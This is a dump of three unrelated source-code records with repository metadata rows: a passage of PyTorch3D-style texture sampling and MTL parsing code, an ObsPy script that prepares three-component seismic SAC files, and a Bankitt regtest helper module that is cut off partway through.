Now consider this subset of the triangle which corresponds to
grid cells 0 and 8:
..code-block::python
1/R ________
|\ 8 |
| \ |
| 0 \ |
|_______\|
0 1/R
The centroids of the triangles are:
0: (1/3, 1/3) * 1/R
8: (2/3, 2/3) * 1/R
For each grid cell we can now calculate the centroid `(c_y, c_x)`
of the corresponding texture triangle:
- if `(x + y) < R`, then offsett the centroid of
triangle 0 by `(y, x) * (1/R)`
- if `(x + y) > R`, then offset the centroid of
triangle 8 by `((R-1-y), (R-1-x)) * (1/R)`.
This is equivalent to updating the portion of Grid 1
above the diagnonal, replacing `(y, x)` with `((R-1-y), (R-1-x))`:
..code-block::python
R _____________________
| | | |
| 20 | 01 | 00 |
|______|______|______|
| | | |
| 10 | 11 | 10 |
|______|______|______|
| | | |
| 00 | 01 | 02 |
|______|______|______|
0 R
The barycentric coordinates (w0, w1, w2) are then given by:
..code-block::python
w0 = c_x
w1 = c_y
w2 = 1- w0 - w1
Args:
image: FloatTensor of shape (H, W, 3)
faces_verts_uvs: uv coordinates for each vertex in each face (F, 3, 2)
texture_size: int
Returns:
atlas: a FloatTensor of shape (F, texture_size, texture_size, 3) giving a
per face texture map.
[1] Liu et al, 'Soft Rasterizer: A Differentiable Renderer for Image-based
3D Reasoning', ICCV 2019
"""
R = texture_size
device = faces_verts_uvs.device
rng = torch.arange(R, device=device)
# Meshgrid returns (row, column) i.e (Y, X)
# Change order to (X, Y) to make the grid.
Y, X = torch.meshgrid(rng, rng)
# pyre-fixme[28]: Unexpected keyword argument `axis`.
grid = torch.stack([X, Y], axis=-1) # (R, R, 2)
# Grid cells below the diagonal: x + y < R.
below_diag = grid.sum(-1) < R
# map a [0, R] grid -> to a [0, 1] barycentric coordinates of
# the texture triangle centroids.
bary = torch.zeros((R, R, 3), device=device) # (R, R, 3)
slc = torch.arange(2, device=device)[:, None]
# w0, w1
bary[below_diag, slc] = ((grid[below_diag] + 1.0 / 3.0) / R).T
# w0, w1 for above diagonal grid cells.
# pyre-fixme[16]: `float` has no attribute `T`.
bary[~below_diag, slc] = (((R - 1.0 - grid[~below_diag]) + 2.0 / 3.0) / R).T
# w2 = 1. - w0 - w1
bary[..., -1] = 1 - bary[..., :2].sum(dim=-1)
# Calculate the uv position in the image for each pixel
# in the per face texture map
# (F, 1, 1, 3, 2) * (R, R, 3, 1) -> (F, R, R, 3, 2) -> (F, R, R, 2)
uv_pos = (faces_verts_uvs[:, None, None] * bary[..., None]).sum(-2)
# bi-linearly interpolate the textures from the images
# using the uv coordinates given by uv_pos.
textures = _bilinear_interpolation_vectorized(image, uv_pos)
return textures
def _bilinear_interpolation_vectorized(
image: torch.Tensor, grid: torch.Tensor
) -> torch.Tensor:
"""
Bi linearly interpolate the image using the uv positions in the flow-field
grid (following the naming conventions for torch.nn.functional.grid_sample).
This implementation uses the same steps as in the SoftRas cuda kernel
to make it easy to compare. This vectorized version requires less memory than
_bilinear_interpolation_grid_sample but is slightly slower.
If speed is an issue and the number of faces in the mesh and texture image sizes
are small, consider using _bilinear_interpolation_grid_sample instead.
Args:
image: FloatTensor of shape (H, W, D) a single image/input tensor with D
channels.
grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the
points at which to sample a value in the image. The grid values must
be in the range [0, 1]. u is the x direction and v is the y direction.
Returns:
out: FloatTensor of shape (N, H, W, D) giving the interpolated
D dimensional value from image at each of the pixel locations in grid.
"""
H, W, _ = image.shape
# Convert [0, 1] to the range [0, W-1] and [0, H-1]
grid = grid * torch.tensor([W - 1, H - 1]).type_as(grid)
weight_1 = grid - grid.int()
weight_0 = 1.0 - weight_1
grid_x, grid_y = grid.unbind(-1)
y0 = grid_y.to(torch.int64)
y1 = (grid_y + 1).to(torch.int64)
x0 = grid_x.to(torch.int64)
x1 = x0 + 1
weight_x0, weight_y0 = weight_0.unbind(-1)
weight_x1, weight_y1 = weight_1.unbind(-1)
# Bi-linear interpolation
# griditions = [[y, x], [(y+1), x]
# [y, (x+1)], [(y+1), (x+1)]]
# weights = [[wx0*wy0, wx0*wy1],
# [wx1*wy0, wx1*wy1]]
out = (
image[y0, x0] * (weight_x0 * weight_y0)[..., None]
+ image[y1, x0] * (weight_x0 * weight_y1)[..., None]
+ image[y0, x1] * (weight_x1 * weight_y0)[..., None]
+ image[y1, x1] * (weight_x1 * weight_y1)[..., None]
)
return out
def _bilinear_interpolation_grid_sample(
image: torch.Tensor, grid: torch.Tensor
) -> torch.Tensor:
"""
Bi linearly interpolate the image using the uv positions in the flow-field
grid (following the conventions for torch.nn.functional.grid_sample).
This implementation is faster than _bilinear_interpolation_vectorized but
requires more memory so can cause OOMs. If speed is an issue try this function
instead.
Args:
image: FloatTensor of shape (H, W, D) a single image/input tensor with D
channels.
grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the
points at which to sample a value in the image. The grid values must
be in the range [0, 1]. u is the x direction and v is the y direction.
Returns:
out: FloatTensor of shape (N, H, W, D) giving the interpolated
D dimensional value from image at each of the pixel locations in grid.
"""
N = grid.shape[0]
# convert [0, 1] to the range [-1, 1] expected by grid_sample.
grid = grid * 2.0 - 1.0
image = image.permute(2, 0, 1)[None, ...].expand(N, -1, -1, -1) # (N, 3, H, W)
# Align_corners has to be set to True to match the output of the SoftRas
# cuda kernel for bilinear sampling.
out = F.grid_sample(image, grid, mode="bilinear", align_corners=True)
return out.permute(0, 2, 3, 1)
MaterialProperties = Dict[str, Dict[str, torch.Tensor]]
TextureFiles = Dict[str, str]
TextureImages = Dict[str, torch.Tensor]
def _parse_mtl(f, device="cpu") -> Tuple[MaterialProperties, TextureFiles]:
material_properties = {}
texture_files = {}
material_name = ""
with _open_file(f, "r") as f:
for line in f:
tokens = line.strip().split()
if not tokens:
continue
if tokens[0] == "newmtl":
material_name = tokens[1]
material_properties[material_name] = {}
elif tokens[0] == "map_Kd":
# Diffuse texture map
# Account for the case where filenames might have spaces
filename = line.strip()[7:]
texture_files[material_name] = filename
elif tokens[0] == "Kd":
# RGB diffuse reflectivity
kd = np.array(tokens[1:4]).astype(np.float32)
kd = torch.from_numpy(kd).to(device)
material_properties[material_name]["diffuse_color"] = kd
elif tokens[0] == "Ka":
# RGB ambient reflectivity
ka = np.array(tokens[1:4]).astype(np.float32)
ka = torch.from_numpy(ka).to(device)
material_properties[material_name]["ambient_color"] = ka
elif tokens[0] == "Ks":
# RGB specular reflectivity
ks = np.array(tokens[1:4]).astype(np.float32)
ks = torch.from_numpy(ks).to(device)
material_properties[material_name]["specular_color"] = ks
elif tokens[0] == "Ns":
# Specular exponent
ns = np.array(tokens[1:4]).astype(np.float32)
ns = torch.from_numpy(ns).to(device)
material_properties[material_name]["shininess"] = ns
return material_properties, texture_files
def _load_texture_images(
material_names: List[str],
data_dir: str,
material_properties: MaterialProperties,
texture_files: TextureFiles,
) -> Tuple[MaterialProperties, TextureImages]:
final_material_properties = {}
texture_images = {}
# Only keep the materials referenced in the obj.
for material_name in material_names:
if material_name in texture_files:
# Load the texture image.
path = os.path.join(data_dir, texture_files[material_name])
if os.path.isfile(path):
image = _read_image(path, format="RGB") / 255.0
image = torch.from_numpy(image)
texture_images[material_name] = image
else:
msg = f"Texture file does not exist: {path}"
warnings.warn(msg)
if material_name in material_properties:
final_material_properties[material_name] = material_properties[
material_name
]
return final_material_properties, texture_images
def load_mtl(
f, material_names: List[str], data_dir: str, device="cpu"
) -> Tuple[MaterialProperties, TextureImages]:
"""
Load texture images and material reflectivity values for ambient, diffuse
and specular light (Ka, Kd, Ks, Ns).
Args:
f: a file-like object of the material information.
material_names: a list of the material names found in the .obj file.
data_dir: the directory where the material texture files are located.
Returns:
material_properties: dict of properties for each material. If a material
does not have any properties it will have an empty dict.
{
material_name_1: {
"ambient_color": tensor of shape (1, 3),
"diffuse_color": tensor of shape (1, 3),
"specular_color": tensor of shape (1, 3),
"shininess": tensor of shape (1)
},
material_name_2: {},
...
}
texture_images: dict of material names and texture images
{
material_name_1: (H, W, 3) image,
...
}
"""
material_properties, texture_files = _parse_mtl(f, device)
return _load_texture_images(
material_names, data_dir, material_properties, texture_files
)
| [
"[email protected]"
] | |
dbbdd80325b36ade3a92fc51452029f8d9e7b58e | d4ca03693383a5bc20bcdf7b7d552bba1d5467ff | /prepare_3comp.py | c3f7453dccf62501b6eac3430daf838f8eb00c62 | [] | no_license | samhaug/beamform_code | abaa1c723fec6143523b4bf8c05e7daa2655584d | 3bb201356056c1ee91a141b057ff7c666171de2a | refs/heads/master | 2023-01-19T22:15:02.272484 | 2020-11-24T23:05:47 | 2020-11-24T23:05:47 | 289,100,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | import obspy
from os.path import isdir
from subprocess import call
from obspy.taup import TauPyModel
import numpy as np
from matplotlib import pyplot as plt
model = TauPyModel(model='prem')
if not isdir("./z_comp"):
call("mkdir ./z_comp",shell=True)
if not isdir("./e_comp"):
call("mkdir ./e_comp",shell=True)
if not isdir("./n_comp"):
call("mkdir ./n_comp",shell=True)
print('reading')
z = obspy.read('data/*BHZ*')
n = obspy.read('data/*BHN*')
e = obspy.read('data/*BHE*')
print('read')
z_l = []
n_l = []
e_l = []
all_l = []
z.interpolate(6)
n.interpolate(6)
e.interpolate(6)
#z.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
#n.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
#e.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
z.detrend()
n.detrend()
e.detrend()
# Trim data to numsamp samples. Remove shorter traces
numsamp=3882
z_netw=[]
z_stat=[]
z_loc=[]
for idx,tr in enumerate(z):
z[idx].data = z[idx].data[0:numsamp]
if len(z[idx].data) != numsamp:
z_stat.append(z[idx].stats.station)
z_netw.append(z[idx].stats.network)
z_loc.append(z[idx].stats.location)
for ii in range(0,len(z_netw)):
z.remove(z.select(station=z_stat[ii],network=z_netw[ii],location=z_loc[ii])[0])
n_netw=[]
n_stat=[]
n_loc=[]
for idx,tr in enumerate(n):
n[idx].data = n[idx].data[0:numsamp]
if len(n[idx].data) != numsamp:
n_stat.append(n[idx].stats.station)
n_netw.append(n[idx].stats.network)
n_loc.append(n[idx].stats.location)
for ii in range(0,len(n_netw)):
n.remove(n.select(station=n_stat[ii],network=n_netw[ii],location=n_loc[ii])[0])
e_netw=[]
e_stat=[]
e_loc=[]
for idx,tr in enumerate(e):
e[idx].data = e[idx].data[0:numsamp]
if len(tr.data) != numsamp:
e_stat.append(e[idx].stats.station)
e_netw.append(e[idx].stats.network)
e_loc.append(e[idx].stats.location)
for ii in range(0,len(e_netw)):
e.remove(e.select(station=e_stat[ii],network=e_netw[ii],location=e_loc[ii])[0])
#Remove duplicates
for tr in z:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in z_l:
z_l.append(name)
else:
z.remove(tr)
for tr in n:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in n_l:
n_l.append(name)
else:
n.remove(tr)
for tr in e:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in e_l:
e_l.append(name)
else:
e.remove(tr)
z_l = []
n_l = []
e_l = []
all_l = []
#Make list of each trace
for tr in z:
z_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
for tr in n:
n_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
for tr in e:
e_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
#Remove traces not common to all three components
for i in (set(all_l)-set(z_l)):
try:
for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
n.remove(tr)
except:
pass
try:
for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
e.remove(tr)
except:
continue
for i in (set(all_l)-set(n_l)):
try:
for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
z.remove(tr)
except:
pass
try:
for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
e.remove(tr)
except:
pass
for i in (set(all_l)-set(e_l)):
try:
for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
n.remove(tr)
except:
pass
try:
for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
z.remove(tr)
except:
pass
z.sort(['network','station','location'])
n.sort(['network','station','location'])
e.sort(['network','station','location'])
#print("Aligning on P")
#for idx,tr in enumerate(z):
# gcarc = tr.stats.sac['gcarc']
# if tr.stats.sac['evdp'] > 1000:
# tr.stats.sac['evdp'] *= 1/1000.
# h = tr.stats.sac['evdp']
# t = model.get_travel_times(source_depth_in_km=h,
# distance_in_degree=gcarc,
# phase_list=['ttp'])[0].time
# s = tr.stats.sampling_rate
# w = tr.data[int((t-20)*s):int((t+20)*s)]
# l = int(len(w)/2.)
# p1 = np.argmax(np.abs(w))
# z[idx].data = np.roll(z[idx].data,l-p1)
# e[idx].data = np.roll(e[idx].data,l-p1)
# n[idx].data = np.roll(n[idx].data,l-p1)
#z.differentiate()
#n.differentiate()
#e.differentiate()
for tr in z:
tr.write('z_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
for tr in n:
if tr.stats.sac['evdp'] > 1000:
tr.stats.sac['evdp'] *= 1/1000.
tr.write('n_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
for tr in e:
if tr.stats.sac['evdp'] > 1000:
tr.stats.sac['evdp'] *= 1/1000.
tr.write('e_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
| [
"[email protected]"
] | |
4657907d92c2d3cfce0d9eba8af849e653c57d19 | fd9d43f9a2826c1c985472d1067317c8d399d3e2 | /qa/rpc-tests/test_framework/util.py | ed2771d4601b389047fc4c84faef3b5ffeda8fc0 | [
"MIT"
] | permissive | Bankitt-Official/bankitt | 006cd394c202ad1f58d253fc4fc2f8c4d1db03a0 | ba6ec5c2d7099eeafab972634e9dddd676b0503f | refs/heads/master | 2020-03-07T11:08:23.628577 | 2018-06-09T09:40:25 | 2018-06-09T09:40:25 | 127,448,326 | 0 | 1 | MIT | 2018-05-12T06:14:49 | 2018-03-30T16:16:35 | C++ | UTF-8 | Python | false | false | 21,631 | py | # Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2014-2017 The Bankitt Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
#Set Mocktime default to OFF.
#MOCKTIME is only needed for scripts that use the
#cached version of the blockchain. If the cached
#version of the blockchain is used without MOCKTIME
#then the mempools will not sync due to IBD.
MOCKTIME = 0
def enable_mocktime():
#For backwared compatibility of the python scripts
#with previous versions of the cache, set MOCKTIME
#to regtest genesis time + (201 * 156)
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "bankitt.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for bankittd to start. This means that RPC is accessible and fully initialized.
Raise an exception if bankittd exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('bankittd exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break # break out of loop on success
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unkown JSON RPC exception
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
or not os.path.isdir(os.path.join("cache","node3"))):
#find and delete old cache directories if any exist
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
# Create cache directories, run bankittds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("BANKITTD", "bankittd"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: bankittd started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: RPC succesfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 156 seconds apart
# starting from 31356 seconds in the past
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in bankitt.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a bankittd and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("BANKITTD", "bankittd")
# RPC tests still depend on free transactions
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: bankittd started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: RPC succesfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple bankittds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except: # If one node failed to start, stop the others
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
